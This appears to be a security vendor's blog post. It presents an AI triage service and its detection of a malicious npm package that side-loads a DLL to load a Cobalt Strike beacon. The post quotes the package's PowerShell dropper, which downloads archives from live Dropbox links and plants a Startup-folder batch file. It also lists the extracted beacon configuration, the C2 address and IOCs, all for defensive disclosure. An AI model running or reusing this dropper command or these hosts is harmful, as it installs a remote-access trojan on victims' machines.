In our previous publication, we detailed our internal artifact-scanning service that continuously monitors packages from multiple sources to detect malicious packages and supply chain attacks.
While this automated scanning capability has proven invaluable for threat detection, the sheer volume of alerts generated by our artifact scanner presents a significant challenge. Security analysts often find themselves overwhelmed by the task of triaging and analyzing hundreds of potential threats daily, making the process both tedious and time-consuming.
To address this bottleneck, we developed RuneAI – an internal service that helps us make sense of large THOR result streams by enriching weak signals with context and highlighting anomalies that deserve analyst attention. We are currently integrating these additional assessments into our products and expect to surface them in THOR Cloud first, followed by the ASGARD Analysis Cockpit.
In our artifact-scanning pipeline, we scan packages from places like npm, PyPI, and VS Code Marketplace with THOR Thunderstorm. We then forward selected low-scoring hits and suspicious artifacts to RuneAI for an additional assessment. That’s also what happened here: a low-scoring THOR rule hit was escalated by RuneAI as genuinely suspicious, which is what kicked off the deeper malware analysis in this post.
Today, we’re showcasing RuneAI’s capabilities through this real-world example from our artifact-scanning pipeline.
RuneAI Assessment
The following section contains the automated assessment generated by RuneAI. It is based on the event stream and matches produced by our THOR Thunderstorm scans of the package, and is intended to prioritize suspicious elements for review. The output is shown as produced, with only minimal formatting applied for readability.
Package: @etoroloro/my_node_js_module:1.0.1
Risk Assessment: 95%
Executive Summary
The script contains critical security flaws including hardcoded Dropbox credentials, malicious payload delivery via Dropbox, persistence via Windows Startup folder, and unvalidated remote command execution. It functions as a remote access trojan (RAT) with C2 capabilities.
Detected patterns
| Pattern | Category | Severity | Reason |
|---|---|---|---|
| Hardcoded Credentials | Credential Theft | Critical | Hardcoded Dropbox client ID, secret, and refresh token in source code (exposed in public repository). |
| Malicious Payload Delivery | Malware Dropper | Critical | Downloads and executes malicious ZIP files from Dropbox via PowerShell commands (iwr/Expand-Archive). |
| Persistence Mechanism | Persistence | Critical | Copies malicious batch file to Windows Startup folder ($env:APPDATA\...\Startup). |
| Unvalidated Remote Command Execution | Remote Code Execution | Critical | Executes arbitrary commands from Dropbox file without validation (via exec(command)). |
| C2 Communication | Command & Control | Critical | Uses Dropbox as C2 channel to receive commands from readFilePath and send outputs to writeFilePath. |
Most Suspicious Code Snippet
'cls; iwr "https://www.dropbox[.]com/scl/fi/f0yd861z6rvugtxuerjn1/protected.zip?rlkey=fx4gvjmf16q5owainu5pfld47&st=cn2oooqb&dl=1" -OutFile "C:\Users\Public\protected.zip"; iwr "https://www.dropbox[.]com/scl/fi/wwbvmzsukfamp9ozo0xxj/data.zip?rlkey=w2j3q5jsmeqfyoyneo21g84qa&st=p443mlzs&dl=1" -o "C:\Users\Public\data.zip"; Expand-Archive -Path "C:\Users\Public\protected.zip" -DestinationPath "C:\Users\Public\"; Expand-Archive -Path "C:\Users\Public\data.zip" -DestinationPath "C:\Users\Public\"; Copy-Item C:\Users\Public\data.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\data.bat" -Force; Remove-Item protected.zip,data.zip -Recurse -Force'
Human-Led Analysis
After RuneAI escalated the package as suspicious, our researchers proceeded with a manual investigation. The following section summarizes what we validated through malware analysis and reverse engineering, including payload staging, execution flow, and post-compromise behavior. This is the point where automated assessment ends and human analysis begins.
The malicious package @etoroloro/my_node_js_module:1.0.1 demonstrates a multi-stage attack chain that combines legitimate software with hidden malicious payloads.
NodeJS package
The Dropbox links were still active at the time of analysis. The script installs legitimate SQLite software as cover, while the malicious payload is delivered via a DLL that is loaded using the DLL side-loading technique. The sqlite3.dll loads DLLSideload.dll, which forwards one function call and simply returns a number. The presence of sideload.jpg appears to be a remnant left behind by the threat actor, as it is never actually read or executed by the malware.
Weaponized sqlite
The main sample sqlite3.dll opens a license.xml file that is actually a valid JPEG file containing hidden data.
Encrypted stage2 payload
The encrypted payload is not steganographically hidden, but rather concatenated to the end of the existing image. The loader searches for the pattern FF D8 FF E0 from the end to the beginning of the file – this is the magic identifier of a JPEG file, making the file appear as concatenated images.
Find encrypted payload
The payload is then decrypted and executed. The decryption uses a custom AES ECB implementation with a custom key derivation process.
Stage2 decryption
The final stage is a Cobalt Strike beacon DLL called beacon.dll, providing the attacker with full remote access capabilities. This sample is already well detected by our existing signatures. The configuration has been extracted:
{
"beacontype": [
"HTTPS"
],
"sleeptime": 60000,
"jitter": 0,
"maxgetsize": 1048576,
"spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
"license_id": 987654321,
"cfg_caution": false,
"kill_date": null,
"server": {
"hostname": "34.203.197.60",
"port": 443,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCAiouXWp2o7OrNP9flXa8Jv5Qvp3yvIaP1q5y4S1uv8QdarYUnuI2CDEB3SI38wxtM8VJSF+hsd9d8nK1pJRfLIs3jK7G3Y/FaTcoO/AaO0MqMGuh6v0EarJVtGX9iF7/Kmb8Bvd4nPiKJ4kZQHYmIS9gNAoS8NOraaXjfS05CdQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
},
"host_header": "",
"useragent_header": null,
"http-get": {
"uri": "/match",
"verb": "GET",
"client": {
"headers": null,
"metadata": null
},
"server": {
"output": [
"print"
]
}
},
"http-post": {
"uri": "/submit.php",
"verb": "POST",
"client": {
"headers": null,
"id": null,
"output": null
}
},
"tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"crypto_scheme": 0,
"proxy": {
"type": null,
"username": null,
"password": null,
"behavior": "Use IE settings"
},
"http_post_chunk": 0,
"uses_cookies": true,
"post-ex": {
"spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
"spawnto_x64": "%windir%\\sysnative\\rundll32.exe"
},
"process-inject": {
"allocator": "VirtualAllocEx",
"execute": [
"CreateThread",
"SetThreadContext",
"CreateRemoteThread",
"RtlCreateUserThread"
],
"min_alloc": 0,
"startrwx": true,
"stub": "rlr8/ugCZnTcjztPLaRsfw==",
"transform-x86": null,
"transform-x64": null,
"userwx": true
},
"dns-beacon": {
"dns_idle": null,
"dns_sleep": null,
"maxdns": null,
"beacon": null,
"get_A": null,
"get_AAAA": null,
"get_TXT": null,
"put_metadata": null,
"put_output": null
},
"pipename": null,
"smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"stage": {
"cleanup": false
},
"ssh": {
"hostname": null,
"port": null,
"username": null,
"password": null,
"privatekey": null
}
}
The C2 is hosted on an Amazon EC2 server:
IP info. Credit: ipinfo.io
Conclusions
Scanners and human analysts operate in very different domains. A scanner like THOR excels at low-ambiguity, high-volume work: applying many rules to many artifacts quickly and consistently. Human analysts excel at high-ambiguity, low-volume work: examining a small number of items in depth, recognizing subtle irregularities, and forming hypotheses from incomplete evidence.
AI is most useful in the space between these two extremes. It neither replaces deterministic scanning nor human judgment. Instead, it can process a moderate volume of imperfect, context-heavy signals and provide additional perspective – highlighting anomalies, connecting weak indicators, and helping prioritize what deserves closer review.
This case is a practical example of that role. A low-scoring THOR hit on the package was not, by itself, a strong verdict. RuneAI enriched the signal with contextual analysis and escalated it as suspicious, which initiated the deeper manual investigation that uncovered the full execution chain.
The diagram below illustrates this positioning:
How AI supports
We apply this approach in our artifact-scanning pipeline to reduce triage workload and to improve visibility into suspicious packages that would otherwise be lost in volume. We plan to make these additional assessments available in our products early next year, first in THOR Cloud and later in the ASGARD Analysis Cockpit.
IOCs
| File | SHA-256 |
|---|---|
| my_node_js_module-1.0.1.tgz | e0a0b3bf0eafc0560b1754c67b0e74e6ad0eeea32f573758f5ba8d7838e5d219 |
| beacon.dll | 6d79bbfadf675deed60b259ae272058c809bfdd53476c3673f9cca797c6fd10b |
| data.bat | d61864987b15020173d7a6ac84cfe0787a2b841fbbb9b98eb26b8c7c9acff5b1 |
| sqlite3.dll | f08c5b748c91dd45fd73c5e85920f656e361d94b869e2147410b2b528c6ae78f |
Network Indicators:
- C2 Server:
34.203.197.60:443 - Boot script: https://www.dropbox[.]com/scl/fi/f0yd861z6rvugtxuerjn1/protected.zip?rlkey=fx4gvjmf16q5owainu5pfld47&st=cn2oooqb&dl=1
- Weaponized sqlite: https://www.dropbox[.]com/scl/fi/wwbvmzsukfamp9ozo0xxj/data.zip?rlkey=w2j3q5jsmeqfyoyneo21g84qa&st=p443mlzs&dl=1
Maurice Fielenbach
Florian Roth
Marius Benthin
Marc Hirtz